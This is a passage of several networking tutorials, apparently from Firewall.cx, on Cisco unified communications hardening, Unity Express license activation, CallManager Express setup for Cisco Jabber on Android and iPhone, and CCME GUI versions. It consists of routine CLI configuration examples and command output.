  • Use the SSO available in Cisco UC applications to suppress fraudulent admission to network.
  • Configure off-hours calling policies in line with the organization’s policies.
  • Configure administrative group privilege restriction levels.
  • Disable PSTN to PSTN trunk transfer.
  • Enable ad-hoc conferencing conclusion on exit of the initiator.
  • Harden IP Phones by disabling unused features and restricting settings access.
  • Periodically review system usage reports for abnormal traffic patterns or destinations.
  • Use VPN to provide a secure conduit for communication with telecommuters/remote workers. V3PN, available in Cisco IOS routers and security appliances, enables encryption of voice, video, and data traffic using IPSec. SSL VPN can also be used from VPN Phones and SSL VPN client on PC’s with softphone.
  • Enforce Antivirus (on Windows based servers) and Host Intrusion Prevention System (HIPS) on Windows and Linux based servers.
  • The human factor cannot be ignored. Hence, train people in your organization about their responsibility for executing enterprise risk management in accordance with established directives and protocols.
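To make the layer 2 recommendations above more concrete, the following Catalyst sketch illustrates DHCP snooping, Dynamic ARP Inspection, port security and BPDU Guard on a typical access port (VLAN numbers, interface names and limits are assumptions for illustration only, not a hardening baseline):

! assumed data VLAN 10 and voice VLAN 20
ip dhcp snooping
ip dhcp snooping vlan 10,20
ip arp inspection vlan 10,20
!
interface GigabitEthernet0/1
 description User PC and IP Phone
 switchport mode access
 switchport access vlan 10
 switchport voice vlan 20
 switchport port-security
 switchport port-security maximum 3
 switchport port-security violation restrict
 spanning-tree portfast
 spanning-tree bpduguard enable
!
! unused access ports should be shut down
interface range GigabitEthernet0/20 - 24
 shutdown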

Summary

In a nutshell, there is no one-size-fits-all when it comes to securing a Cisco UC network. No two networks are alike and organizations must examine UC security from a business perspective by defining their vision, goals, policies, and patterns of usage. It’s important that the security implemented is aligned with and in compliance with applicable laws and regulations, while being effective against business risks.

Moreover, a change in risk appetite must be observed when an organization’s priorities or business processes change. A multitude of the UC security risks can be resolved by applying existing ad-hoc security measures and solutions in a planned manner as listed in previous sections. The risk management solution approach is based on evaluating the following factors in order to minimize costs and maximize mitigation of risks:

  • Business Impact of realization of a risk
  • Compliance requirements
  • Threat surface
  • Budgetary constraints

This schema is depicted in the below figure:

Risk Management Specifics for Cisco UC

Cisco unified communications risk management

A successful UC risk management system or construct will ideally prevent threats from being realized while minimizing business impact, in compliance with laws and regulations, and within budget, such that the Total Cost of Ownership (TCO) decreases with time while Return on Investment (ROI) increases.

About The Author

Akhil Behl is a Senior Network Consultant with Cisco Advanced Services, focusing on Cisco Collaboration and Security architectures. He leads Collaboration and Security projects worldwide for Cisco Services and the Collaborative Professional Services (CPS) portfolio for the commercial segment. Prior to his current role, he spent 10 years working in various roles at Linksys, Cisco TAC, and Cisco AS. He holds CCIE (Voice and Security), PMP, ITIL, VMware VCP, and MCP certifications.

He has several research papers published to his credit in international journals including IEEE Xplore.

He is a prolific speaker and has contributed at prominent industry forums such as Interop, Enterprise Connect, Cloud Connect, Cloud Summit, Cisco SecCon, IT Expo, and Cisco Networkers. Akhil is also the author of Cisco Press title ‘Securing Cisco IP Telephony Networks’.

Read our exclusive interview of Akhil Behl and discover Akhil's troubleshooting techniques, guidelines in designing and securing VoIP networks, advantages and disadvantages of Cisco VoIP Telephony and much more: Interview: Akhil Behl Double CCIE (Voice & Security) #19564.

 


Unity Express License Setup & Installation - Software Activation

Unity Express provides any organization with a quick and convenient way to manage voicemail, auto attendant and interactive voice response (IVR) services.  These services are provided within the Unity Express module.

When purchased, Unity Express includes a few licenses for some services, such as voice ports for auto attendant, while other services like mailboxes are not included.  This policy forces companies requiring these services to purchase additional licenses from Cisco in order to activate or expand the system’s capacity.

A good example is the Unity Express voice mailbox service. When purchasing Unity Express, by default it does not include any mailboxes. 

While the Unity Express web interface allows the creation of voice mailboxes despite the fact no licenses are installed, you won’t be able to make use of them unless the appropriate number of licenses is installed.

When a caller is redirected to a user’s voice mailbox where the system does not have the necessary licenses installed, instead of hearing the called party’s voicemail prompting to leave a message, the following prompt is heard:

Voice mail system is unavailable, try again later, to talk to the operator, press zero.

Engineers and Administrators interested can read our popular articles covering the physical installation and initial setup of Unity Express on Cisco CallManager Express or Cisco Voice Gateways:

Installing & Verifying Unity Express Licenses – 4 Simple Steps

Installing Unity Express licenses is not all that complicated. We’ve broken down the process into four simple steps to make it as clear and simple as possible:

  • Registering and Assigning your Product Authorization Key (PAK) number
  • Obtaining the Correct UDI Product ID and Serial Number
  • Installing the Software License on Unity Express
  • Verifying Unity Express License Installation

No matter what type of license you have the installation process is the same. It is important to note that when installing multiple PAKs for a service they must be combined into a single license. For example, if you have purchased four packs of 5-user-mailbox licenses to support a total of 20 users, you must ensure these are combined into a single 20 mailbox license file and not four x 5-mailbox license files. If problems arise, Cisco support is always available to help resolve any licensing problem.

Before we begin the license installation process it is important to verify the existing licenses so we are sure of what we have already.

Verifying Existing Cisco Unity Express Licenses

Before considering purchasing licenses it is necessary to verify what is already installed. This is easily done by using the following command to view the currently installed licenses. Note that License Type: Permanent in the command output is what we are looking for; it represents a permanent license, i.e. the licenses actually installed:

2911-UnityExpress#  show license all
License Store: Primary License Storage
StoreIndex:  0  Feature: VMIVR-PORT                        Version: 1.0
        License Type: Permanent
        License State: Active, In Use
        License Count: 2 /2
        License Priority: Medium
License Store: Evaluation License Storage
StoreIndex:  0  Feature: VMIVR-VM-MBX                      Version: 1.0
        License Type: Evaluation
        License State: Active, Not in Use, EULA accepted
            Evaluation total period:  8 weeks  4 days
            Evaluation period left:  0 minute   0 second 
        License Count: 600 / 0
        License Priority: Low
License Store: Evaluation License Storage

Note: We’ve removed the rest of the command output to avoid redundant information.

License Type: Evaluation is, as the output indicates, evaluation licenses. These are not installed/purchased licenses and normally are limited to a 60 day trial period after which they expire and are disabled.

Another way to verify the installed licenses is to log into the Unity Express GUI interface and visit the Administration>Licenses section:

Cisco Unity Express license summary

As both CLI output and GUI interface confirm, we currently have two VMIVR-PORT licenses installed. This license feature will allow up to two simultaneous calls to the autoattendant system or user voice mailbox service.

Register & Assign Your Cisco Product Authorization Key (PAK) Number

When purchasing a Unity Express license, you’ll receive it either as a hardcopy or electronically delivered license. The license contains an 11-digit Product Authorization Key number, also known as PAK. The PAK is basically your license, which needs to be associated with your Unity Express hardware. This process is done through the Cisco.com website. Once associated, the necessary license file will be delivered to you electronically and you’ll then need to install it on Unity Express.

To begin registration, visit  http://www.cisco.com/go/license.  A valid CCO account is required, so users without a CCO account will be required to register first. After the logon process is complete, we need to enter our 11-digit PAK number as shown in the screenshot below:

If more than one license PAK has been purchased for the same family product, for example 2 packs of 5-user mailbox license, then click on the Load More PAKs button and the page will provide additional fields to enter all purchased PAKs.

Since our example only contains a single PAK, we enter it and then click on Fulfil Single PAK.

The next page allows us to assign our PAK to our Unity Express hardware. Click the Quantity Available check-box to ensure all quantities are selected (one in our case) and below enter the UDI Product ID and Serial Number.

cisco unity express PAK number

Note: The small arrow box on the right of the UDI Product ID field (shown in the screenshot below) will produce a pop-up window instructing to issue the “Show License UDI” CLI command in Unity Express, to obtain the correct Product ID and Serial Number, however, the information provided by the CLI prompt is misleading and can cause confusion.

Cisco Unity Express License Pak & serial number

 The next section covers how to obtain the correct UDI Product ID and Serial Number.

Obtaining The Correct UDI Product ID & Serial Number

From your router prompt, connect to the Unity Express CLI prompt and issue the show license udi command:

2911-CCME# service-module ism 0/0 session
Trying 192.168.10.5, 2131 ... Open
2911-UnityExpress#
2911-UnityExpress# show license udi
Device#    PID           SN              UDI
----------------------------------------------------------------
*0      ISM-SRE-300-K9  FOC162427RV   ISM-SRE-300-K9:FOC162427RV

Note that, under the UDI column, the system shows ISM-SRE-300-K9:FOC162427RV – this is actually the UDI and serial number (UDI:SERIAL_Number). The UDI is everything before the colon (:).

So, UDI is ISM-SRE-300-K9 and the system serial number is FOC162427RV. If ISM-SRE-300-K9:FOC162427RV is entered in the UDI Product ID field, the system will not accept it.

Cisco does not mention how to distinguish the correct UDI from the output provided, this can cause frustration when trying to assign the PAK to the hardware.

Even the show version provides the same confusing result. Notice the UDI section:

2911-UnityExpress# show version
2911-UnityExpress uptime is 0 weeks, 0 days, 17 hours, 23 minutes
CPU Model:           Genuine Intel(R) processor   1.06GHz
CPU Speed (MHz):     1066.774
CPU Cache (KByte):   64
BogoMIPS:            2134.79
SKU:                 ISM-SRE-300-K9
UDI:                 ISM-SRE-300-K9:FOC162427RV
Chassis Type:        C2911
Chassis Serial:      FCZ262120AD
Module Type:         ISM
Module Serial:       FOC162427RV
Compact Flash:       4110MB
SDRAM (MByte):       512

Register & Assign Your Product Authorization Key (PAK) Number (continued)

After entering the UDI Product ID and Serial Number in the provided fields, press the Assign button to assign the PAK to the Unity Express hardware. The page will update and show Device, PAK and SKU assignment:

cisco-voice-ue-license-5

We are now ready to continue by clicking on the Next button.

The system now presents us with the final page where we enter our email address and confirm the end user. We must agree to the License terms before the license can be generated. When ready, click on the Get License button:

cisco-voice-ue-license-6

 

A pop up window confirms the license is being processed and will be emailed when complete. This takes a couple of seconds. There is also an option to download the license directly in case access to email is not possible:

cisco-voice-ue-license-7

A final confirmation window tells us the license is ready for download and has also been emailed to our registered address:

Cisco unity express license delivery

The license file name is somewhat long and contains the system’s serial number and a 17 digit number.

Installing The Software License On Unity Express

Unity Express licenses are installed via an FTP server. The FTP server will serve the license file and we’ll instruct Unity Express to fetch the license using the CLI prompt.

We assume an FTP server is up and running on a workstation and is accessible from Unity Express.

Now we need to log into Unity Express and issue the command so it can fetch the license and install it.

Note the command syntax is ftp://username:password@ftp_server_ip/licensefilename:

2911-CCME# service-module ism 0/0 session
Trying 192.168.10.5, 2131 ... Open
2911-UnityExpress#

2911-UnityExpress# license install ftp://admin:password@ftp_server_ip/FOC162427RV_20121026011249726.lic
Installing...Feature:VMIVR-VM-MBX...Successful:No Error
License Note:
Application will evaluate this change upon next reload
1/1 licenses were successfully installed
0/1 licenses were existing licenses
0/1 licenses were failed to install

2911-UnityExpress# reload
Reloading the system will terminate all end user sessions.
Doing a reload will cause any unsaved configuration data to be lost.
Are you sure you want to reload? [confirm]
2911-UnityExpress#

MONITOR SHUTDOWN...

Verify Unity Express License Installation

Upon reboot, Unity Express will enable the newly installed license and it will be available for use. When the reboot completes, we can verify the license status using the show license status application command.

To make things a bit more interesting we created 10 voice mailboxes while installing a 5 user mailbox license. This means we had more mailboxes than our installed license allowed. Check out the result:

2911-UnityExpress# show license status application
voicemail disabled, installed mailbox quantity (10) exceeds licensed count (5)
ivr disabled, no activated ivr session license available

When dialing a user’s extension where voicemail was enabled, as explained earlier, instead of the standard greeting message we got the Cisco lady telling us: Voice mail system is unavailable, try again later, to talk to the operator, press zero.

After deleting the 5 additional mailboxes and issuing the show license status application command, we notice the voicemail service is now enabled:

2911-UnityExpress# show license status application
voicemail enabled: 2 ports, 2 sessions, 5 mailboxes
ivr disabled, no activated ivr session license available

Useful Unity Express License Show Commands

Following is a collection of useful commands that provide information on Unity Express’s license condition:

'show license status application'

The show license status application command displays the status of the license applications installed in Unity Express. The command accepts additional parameters such as: ivr, ports, timecardview, voicemail. By entering the command as shown, it will display information for all applications:

 2911-UnityExpress# show license status application
voicemail enabled: 2 ports, 2 sessions, 5 mailboxes
ivr disabled, no activated ivr session license available

'show license all'

The show license all command displays the summary of all the licenses installed in your Unity Express system. The command has no additional parameters:

2911-UnityExpress# show license all
License Store: Primary License Storage
StoreIndex:  0  Feature: VMIVR-PORT      Version: 1.0
        License Type: Permanent
        License State: Active, In Use
        License Count: 2 /2
        License Priority: Medium
License Store: Primary License Storage
StoreIndex:  1  Feature: VMIVR-VM-MBX    Version: 1.0
        License Type: Permanent
        License State: Active, In Use
        License Count: 5 /5
        License Priority: Medium
License Store: Evaluation License Storage
StoreIndex:  0  Feature: VMIVR-VM-MBX    Version: 1.0
        License Type: Evaluation
        License State: Inactive
            Evaluation total period:  8 weeks  4 days
            Evaluation period left:  0 minute   0 second 
        License Count: 600 / 0
        License Priority: Low
License Store: Evaluation License Storage
StoreIndex:  1  Feature: VMIVR-PORT      Version: 1.0
        License Type: Evaluation
        License State: Inactive
            Evaluation total period:  8 weeks  4 days
            Evaluation period left:  8 weeks  4 days
        License Count: 60 / 0
        License Priority: None
License Store: Evaluation License Storage
StoreIndex:  2  Feature: VMIVR-IVR-SESS  Version: 1.0
        License Type: Evaluation
        License State: Active, Not in Use, EULA not accepted
            Evaluation total period:  8 weeks  4 days
            Evaluation period left:  8 weeks  4 days
        License Count: 60 / 0
        License Priority: None
License Store: Dynamic Evaluation License Storage
StoreIndex:  0  Feature: TCV-USER        Version: 1.0
        License Type: Evaluation
        License State: Active, Not in Use, EULA not accepted
            Evaluation total period:  8 weeks  4 days
            Evaluation period left:  8 weeks  4 days
        License Count: 600 / 0
        License Priority: None

'show license in-use'

The show license in-use command displays information about the licenses that are in use on your Unity Express module. Again, there are no additional parameters for this command:

2911-UnityExpress# show license in-use
StoreIndex:  0  Feature: VMIVR-PORT      Version: 1.0
        License Type: Permanent
        License State: Active, In Use
        License Count: 2 /2
        License Priority: Medium
StoreIndex:  1  Feature: VMIVR-VM-MBX    Version: 1.0
        License Type: Permanent
        License State: Active, In Use
        License Count: 5 /5
        License Priority: Medium

This concludes our Cisco Unity Express License Setup & Installation - Software Activation article.


Configuring CallManager Express (CME) To Support Cisco Jabber IP Phone for Android & iPhone

cisco cme jabber

Cisco is continuously developing its CallManager Express product, introducing new features and services to help keep up with its customers' and the market’s demands.

With the rapid increase of the mobile phone market, customer requests for CallManager Express to support them are on the rise. In response, Cisco added support for Apple’s popular iPhone with CallManager Express v8.6 ( IOS 15.1(4)M ), but unfortunately did not include Android support, leaving millions of Android phone users in the dark. 

At the time, Cisco Mobile 8.0 and 8.1 were available for iPhone users, allowing them to connect and make phone calls via CME just like any normal softphone client. Cisco Mobile was later renamed Cisco Jabber.

cisco-cme-jabber-iphones

 

Thankfully, with CallManager Express v9.1 ( IOS 15.2(4)M1 ), Cisco finally added support for the Jabber application on the Android operating system. Both Cisco Jabber versions (Android and iPhone) use SIP as the communication protocol with CME; SCCP is not used.

While CME 9.1 now supports both iPhone and Android phones, getting them to work is a different story.

This article will demonstrate how to configure your CallManager Express v9.1 to support Cisco Jabber for both iPhone and Android operating systems.

At the time of writing, the latest version of Cisco Jabber for iPhone is 9.0 (1) and 9.0.1.1911 for the Android operating system.

Cisco ISR 2800 Series CME – No Support for Jabber Android Users

On the 1st of November 2010, Cisco announced the discontinuation of all 2800 series ISR routers and, as a result, will only provide minor software upgrades for the platform.

The latest IOS version available for the 2800 series is 15.1(4) which, according to our CME-IOS Matrix, supports CallManager Express v8.6.  

Since support for the Android operating system begins officially with v9.1, the 2800 series CME routers will only be able to support Cisco Jabber for iPhone.  Unfortunately no support for Android is available (yet) for this platform, and we don’t expect to see any in the near future.  

IT Managers and engineers who want to provide CME services to their Android Jabber users must upgrade to the 2900 series platform.

Cisco Jabber For Android – How To Overcome Bugs!

Jabber support for the Android operating system is very new on CME and as such, the Jabber version available in Google’s Play Store might not work properly. 

When we tested Cisco’s Jabber from the Google Play Store using our Samsung Galaxy SII (Model GT-I9100) running Ice Cream Sandwich 4.0.4, it was not able to connect to our CME v9.1. We tried the LAN Wi-Fi and even the GSM network (via AnyConnect VPN), but the application continuously failed to register and requested we check our Internet Calling settings.

After consulting with Cisco engineers around the globe, we discovered we had hit a bug on the Android version of Jabber, specific to some Samsung phones running Android 4.0.4. This was later confirmed with some HTC Android phones as well.

However, we managed to obtain an Engineering Special (ES) edition (as Cisco calls it) of Jabber that overcomes the problems mentioned and works like a charm!  This ES Jabber release is not available through Google’s Play Store, nor from Cisco as a direct download.

Fortunately, Firewall.cx Android users can download the engineering special edition from our Cisco Tools and Applications section!

Configuring CallManager Express To Support Jabber For Android & iPhone

The configuration settings of CME are pretty much identical for both Android and iPhone operating systems.

Since Jabber for CME uses SIP as a communication protocol, it is mandatory to enable SIP registration on CME.  Enabling SIP registration requires special attention to ensure registration is only restricted to the local network or VPN users at most.

Opening SIP registration to public IP’s or untrusted networks is definitely not recommended as it could allow anyone to connect and register to the CallManager Express.

First step is to configure CME to allow calls from SIP to SIP endpoints and enable SIP registrar:

voice service voip
 ip address trusted list
  ipv4 192.168.50.5 255.255.255.255
 allow-connections sip to sip
 sip
  bind control source-interface GigabitEthernet0/1
  bind media source-interface GigabitEthernet0/1
  registrar server

The ip address trusted list section is used to list remote client IP addresses which are not part of the local network. This will allow them to register with CME and place or receive calls.  If for example your Android or iPhone connects to the corporate LAN via VPN (AnyConnect VPN) and obtains an IP address on a different network/subnet from CME, it will be necessary to list the VPN IP address or VPN network pool for the phone to register. 
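
For example, if AnyConnect clients receive their addresses from a hypothetical 192.168.60.0/24 VPN pool, that subnet would be added to the trusted list along these lines (a minimal sketch; adjust the network to your own pool):

voice service voip
 ip address trusted list
  ! Hypothetical AnyConnect VPN address pool
  ipv4 192.168.60.0 255.255.255.0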

The bind control source-interface GigabitEthernet0/1 command ensures SIP uses GigabitEthernet0/1 as the binding interface for all SIP communications. The interface’s IP address will show up as the source IP for all outgoing communications, and all incoming communications are expected to terminate on this interface as well.
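
To quickly confirm the bind settings are in effect, the SIP user agent status can be checked from privileged EXEC mode (a verification sketch; the exact output wording varies between IOS releases):

2911-CCME# show sip-ua status

The output should report the SIP user agent as enabled and show the signalling and media bind performed on the GigabitEthernet0/1 IP address.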

Next step is to configure the voice register global section. This section holds key configuration elements for the correct operation of our CME SIP service.

Here we will specify various parameters, including: setting the SIP registrar to CME mode, the source address for phone registration, the maximum number of extensions (max-dn) and phones (max-pool), authentication for phone registration and, finally, the creation of configuration files for all phones (tftp-path, file text and create profile).

voice register global
  mode cme
  source-address 192.168.9.5 port 5060
  max-dn 8
  max-pool 8
  authenticate register
  authenticate realm firewallcx
  tftp-path flash:
  file text
  create profile sync 0033775744721428

Now we can configure our phone extension using the voice register dn command and SIP phone with the voice register pool command:

voice register dn 5
number 778
name Chris-Android 778
label Chris-Android 778
!
voice register pool 1
registration-timer max 720 min 660
id mac 147D.C5AF.79B2
session-transport tcp
type Jabber-Android
number 1 dn 5
username chris password firewallcx
codec g729r8

While most commands are self-explanatory, we’ll focus on the most important:

number 778: This specifies the extension our SIP phone will have.

id mac 147D.C5AF.79B2: This is the Wi-Fi MAC address of our mobile phone, in our example our Samsung Galaxy SII.

type Jabber-Android: Here we specify the SIP client type. It can be either CiscoMobile-iOS for Apple iPhone users or Jabber-Android for Android users.

codec g729r8: This specifies the codec that will be used for this client. It is possible to use g711ulaw or g711alaw, g722-64k, g729r8 and ilbc.  Each codec has different bandwidth requirements and sound quality.  G729r8 and iLBC require 8 Kbps and 13-15.2 Kbps respectively, while the others require 64 Kbps.  Don’t forget to add the IP overhead to these figures.
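
As a rough worked example (ignoring Layer 2 overhead), a G.729 call sent as 20 ms packets carries a 20-byte voice payload plus roughly 40 bytes of IP/UDP/RTP headers per packet, at 50 packets per second:

(20 + 40) bytes x 8 bits x 50 packets/sec = 24,000 bps, roughly 24 Kbps per G.729 call
(160 + 40) bytes x 8 bits x 50 packets/sec = 80,000 bps, roughly 80 Kbps per G.711 call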

Note: When the SIP phone extension and device configurations are complete or altered, it is imperative we go to the voice register global section and issue the create profile command.  This ensures the appropriate configuration files on CME are created for our SIP devices.
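
For instance, after changing a voice register dn or voice register pool entry, the profile files can be regenerated as follows (a minimal sketch):

2911-CCME(config)# voice register global
2911-CCME(config-register-global)# create profile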

Cisco Jabber For Android (both 4.0.4 & 2.3) Settings – Configuration Example

Connect to the Google Play Store and search for Cisco Jabber:

cisco jabber android marketstore

After downloading and installing Cisco Jabber for Android, launch the application and click on Begin Setup:

cisco-cme-jabber-5

Next, in the Device ID field, enter SEP followed by the phone's Wi-Fi MAC address (found under Applications -> Settings -> Wi-Fi -> Advanced Wi-Fi) without any spaces or dots. Now, enter your CME IP address in the Server Address field.

You can selectively enable Use mobile data network and Use noncorporate Wi-Fi options.  We always select Use noncorporate Wi-Fi only to ensure the GSM mobile network is not used (especially if your provider charges GSM data).

If necessary, enable Auto Start so that Cisco Jabber starts every time your phone restarts. Now click Verify to register with CallManager Express:

cisco jabber android internet calling settings

 After Cisco Jabber successfully registers with CME, we are presented with the main screen and dial pad:

cisco jabber android dialpad

Cisco Jabber For iPhone Settings – Configuration Example

First we need to verify our phone is connected to the corporate Wi-Fi network and is accessible from CME.

  1. Launch Cisco Jabber and complete the setup wizard.
  2. Enter the Device Name: SEP followed by your MAC address without any dots, e.g. SEP147DC5AF79B2.
  3. Enter your CME IP address in the TFTP Server field, e.g. 192.168.9.5.
  4. Turn ON SIP Digest Authentication and enter the username and password configured under the voice register pool section.

Following is a screenshot of the complete settings on our iPhone:

cisco jabber iphone internet calling settings
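
Once the clients are registered, their state can also be checked from the CME CLI (a verification sketch; the output detail varies by IOS release):

2911-CCME# show voice register all
2911-CCME# show voice register pool 1

Both commands should list the Jabber device and its directory number in a registered state once setup on the handset is complete.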

 This concludes our Cisco CallManager Express (CME) Cisco Jabber for Android and iPhone configuration.


Download Cisco CallManager Express CCME GUI Administration Installation Files

Most engineers are aware that to download and install the latest Cisco CallManager Express (CCME) Graphical User Interface (GUI) files, Cisco requires a registered CCO account with the necessary privileges.  To save engineers and administrators the trouble of locating and downloading these files, we are now providing them free via direct download from Firewall.cx - no registration required!

We've conveniently packed into one zip file the CallManager Express GUI files for CCME v3.3, CCME v4.1.0.2, CCME v4.2, CCME v7.1.0.1, CCME v8, CCME v8.5 and CCME v8.6.

Please note that CCME GUI v8.8 and v9.0 contain bugs and are pretty much useless, as no CCME modifications can be saved using these GUI versions; you are therefore advised to use the CCME v8.6 GUI if the GUI interface is absolutely necessary.  For more information on these bugs, please visit our CCME v8.8 & v9.0 bug announcement. CCME GUI version 9.1 was not yet published at the time of this post.

Users can download CCME GUI files by visiting our Cisco Download section.

Step-by-step installation instructions for the CCME GUI are available at the following Firewall.cx articles:

1) CallManager Express GUI Software Installation & Configuration - Part 1
2) CallManager Express GUI Software Installation & Configuration - Part 2

Users who wish to check their IOS CCME version can use the show telephony-service command:

R1# show telephony-service
CONFIG (Version=8.6)
=====================
Version 8.6
Max phoneload sccp version 17
Max dspfarm sccp version 18
Cisco Unified Communications Manager Express
For on-line documentation please see:
http://www.cisco.com/en/US/products/sw/voicesw/ps4625/tsd_products_support_series_home.html
protocol mode default
ip source-address 10.0.0.1 port 2000
ip qos dscp:
 ef (the MS 6 bits, 46, in ToS, 0xB8) for media
 cs3 (the MS 6 bits, 24, in ToS, 0x60) for signal
 af41 (the MS 6 bits, 34, in ToS, 0x88) for video
 default (the MS 6 bits, 0, in ToS, 0x0) for service
service directed-pickup
load 7945 SCCP45.9-1-1SR1S
max-ephones 30
max-dn 100
max-conferences 8 gain -6
dspfarm units 0
dspfarm transcode sessions 0
conference software
privacy
no privacy-on-hold
hunt-group report delay 1 hours
Number of hunt-group configured: 1
hunt-group logout DND
max-redirect 10
voicemail 88
cnf-file location: flash:
cnf-file option: PER-PHONE
network-locale[0] U1   (This is the default network locale for this box)
network-locale[1] US
network-locale[2] US
network-locale[3] US
network-locale[4] US
user-locale[0] US    (This is the default user locale for this box)
user-locale[1] US
user-locale[2] US
user-locale[3] US
user-locale[4] US
srst mode auto-provision is OFF
srst ephone template is 0
srst dn template is 0
srst dn line-mode single
phone service videoCapability 1
moh flash:north-gate.wav
time-format 24
date-format dd-mm-yy
timezone 24 GTB Standard/Daylight Time
url services http://10.0.0.10/
transfer-pattern 6.
transfer-pattern 41
after-hours pstn-prefix 4 4
night-service code *1234
keepalive 30 auxiliary 30
timeout interdigit 4
timeout busy 10
timeout ringing 180
timeout transfer-recall 0
timeout ringin-callerid 8
timeout night-service-bell 12
caller-id name-only: enable
system message Firewall.cx
web admin system name admin  secret 5 $1$QuGK$tLHc4.7jdhWlzp9S9KHjC.
edit DN through Web:  enabled.
edit TIME through web:  enabled.
background save interval 10 minutes
Log (table parameters):
     max-size: 150
     retain-timer: 15
create cnf-files version-stamp 7960 May 12 2011 22:29:16
transfer-system full-consult
transfer-digit-collect new-call
multicast moh 239.10.16.4 port 2000
auto assign 1 to 100
auto assign 1 to 15
local directory service: enabled.
Extension-assigner tag-type ephone-tag.

The table below illustrates the Cisco IOS releases, CallManager Express versioning and CallManager Express GUI version that should be used or installed on the device (router or UC500):

Cisco IOS Release | Cisco Unified CME Version | Cisco Unified CME GUI Version | Specifications Link
15.2(2)T          | 9.0                       | 9.0.0.0 *Buggy*               | CME 9.0 Link
15.1(4)T          | 8.6                       | 8.6.0.0                       | CME 8.6 Link
15.1(3)T          | 8.5                       | 8.5.0.0                       | CME 8.5 Link
15.1(2)T          | 8.1                       | 8.1.0.0                       | CME 8.1 Link
15.1(1)T          | 8.0                       | 8.0.0.0                       | CME 8.0 Link
15.0(1)XA         | 8.0                       | 8.0.0.0                       | CME 8.0 Link
15.0(1)M          | 7.1                       | 7.1.1.0                       | CME 7.1 Link
12.4(24)T         | 7.1                       | 7.1.0.0                       | CME 7.1 Link
12.4(22)T         | 7.0(1)                    | 7.0.0.1                       | CME 7.0 Link
12.4(20)T         | 7.0                       | 7.0.0.0                       | CME 7.0 Link
12.4(15)XZ        | 4.3                       | 4.3.0.0                       | CME 4.3 Link
12.4(11)XW9       | 4.2                       | 4.2.0.4                       | CME 4.2 Link
12.4(15)T         | 4.1                       | 4.1.0.2                       | CME 4.1 Link
12.4(11)T         | 4.0(2)                    | 4.0.3.1                       | CME 4.0(2) Link
12.4(9)T          | 4.0(0)                    | 4.0.0.1                       | CME 4.0 Link
12.4(6)T          | 3.4                       | 3.4.0.1                       | CME 3.4 Link





Cisco Unity Express Installation/Setup - Service Module & Initial Web Interface Configuration - Part 2

As mentioned in Part-1 of our Cisco Unity Express installation article, the Cisco Unity Express setup procedure is identical for the ISM-SRE-300-K9 and SM-SRE-700-K9 modules. We will be using the smaller ISM-SRE-300-K9 for this article. The only notable difference in the CallManager Express configuration will be the module’s interface that connects to CallManager Express.

Users interested can also visit our Cisco VoIP/CCME - CallManager Section where they'll find more articles covering Cisco VoIP, CallManager, CallManager Express and Unity Express.

For the SRE-300, the module’s interface name is interface ISM0/0, whereas for the SM-SRE-700 it is interface SM2/0. Both are Gigabit Ethernet interfaces, connected via each router’s internal bus.

The ISM-SRE-300-K9 module is configured with its own IP address and acts as a separate machine inside the router. Before we can begin configuring Unity Express (which comes preinstalled by Cisco on the module), we must configure IP connectivity with the router so we can then access the ISM-SRE-300-K9 module and initialize the Unity Express setup.

When physically installing an SRE module, CCME will automatically make two additional interfaces available in its configuration. For the ISM-SRE-300-K9, they are interface ISM0/0 and interface ISM0/1, whereas for the SM-SRE-700 they are interface SM2/0 and interface SM2/1.

First step is to configure IP connectivity between the router (CCME) and Unity Express. This is achieved by configuring interface ISM0/0 with an IP address (ISM-SRE-300-K9) or interface SM2/0 for the SM-SRE-700.

Our CCME router has two IP addresses, 192.168.9.5/24 (Data VLAN) and 192.168.10.5/24 (Voice VLAN). When configuring an IP address on Unity Express, there is the choice of assigning one that is part of the existing network(s) (192.168.9.0 or 192.168.10.0) or one that is on a completely different network.

It is a common practice to configure Unity Express with an IP address that is part of the Voice VLAN, that is, 192.168.10.0/24 in our example:

interface ISM0/0
 description Unity-Express-Module
 ip unnumbered GigabitEthernet0/0.2
 ip virtual-reassembly in
 service-module ip address 192.168.10.10 255.255.255.0
 !Application: CUE Running on ISM
 service-module ip default-gateway 192.168.10.5

In the above configuration commands, we’ve configured our Unity Express module with IP address 192.168.10.10 and a default-gateway of 192.168.10.5 (CCME’s Voice VLAN IP address). This is because the Unity Express module is physically connected to our router’s internal interfaces (ISM) and therefore must use one of the router’s IP interfaces as its default gateway.

The ip unnumbered <interface> command allows the Cisco Unity Express module to use a network subnet IP address associated with a specific router egress port such as GigabitEthernet0/0.2. This configuration method requires a static route to the service-engine interface. The router interface associated with the Cisco Unity Express interface (GigabitEthernet 0/0.2) must be in an "up" state at all times for communication between the router and module.
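
For the larger SM-SRE-700, the equivalent configuration would be applied under interface SM2/0 instead (a sketch assuming the same addressing as above):

interface SM2/0
 description Unity-Express-Module
 ip unnumbered GigabitEthernet0/0.2
 service-module ip address 192.168.10.10 255.255.255.0
 service-module ip default-gateway 192.168.10.5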

At this point we should note that GigabitEthernet0/0 is configured as a trunk link with our switch. This configuration method is known as ‘Router on a Stick’ and allows all configured VLANs to pass through a single interface. For more information on this configuration method, please refer to our Router-on-a-Stick article.

Following is the configuration of our GigabitEthernet 0/0 interface:

interface GigabitEthernet0/0
 no ip address
 duplex auto
 speed auto
!
interface GigabitEthernet0/0.1
 description Data-VLAN
 encapsulation dot1Q 1 native
 ip address 192.168.9.5 255.255.255.0
!
interface GigabitEthernet0/0.2
 description Voice-VLAN
 encapsulation dot1Q 2
 ip address 192.168.10.5 255.255.255.0
!

Next step is to create a static route to Unity Express’s IP address via the internal service module (ISM0/0):

2911-CCME (config)# ip route 192.168.10.10 255.255.255.255 ISM0/0

At this point, we should be able to ping Unity Express’s IP address:

2911-CCME# ping 192.168.10.10
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.10.10, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/1/1 ms

CallManager Express - Telephony-Service Configuration

The next step is to configure our CallManager Express web-based administrator user (if not already configured), the voicemail extension, the voicemail dial-peer and the Message Waiting Indicator (MWI) extensions used to turn the IP phone's red message-waiting light on or off when a message is waiting in the user’s voice mailbox:

2911-CCME(config)# telephony-service
2911-CCME(config-telephony)# web admin system name administrator password firewallcx
2911-CCME(config-telephony)# voicemail 810
2911-CCME(config-telephony)# create cnf
Creating CNF files
2911-CCME(config-telephony)# exit
2911-CCME(config)#
2911-CCME(config)# dial-peer voice 101 voip
2911-CCME(config-dial-peer)# description Unity Express - VoiceMail
2911-CCME(config-dial-peer)# destination-pattern 810
2911-CCME(config-dial-peer)# session protocol sipv2
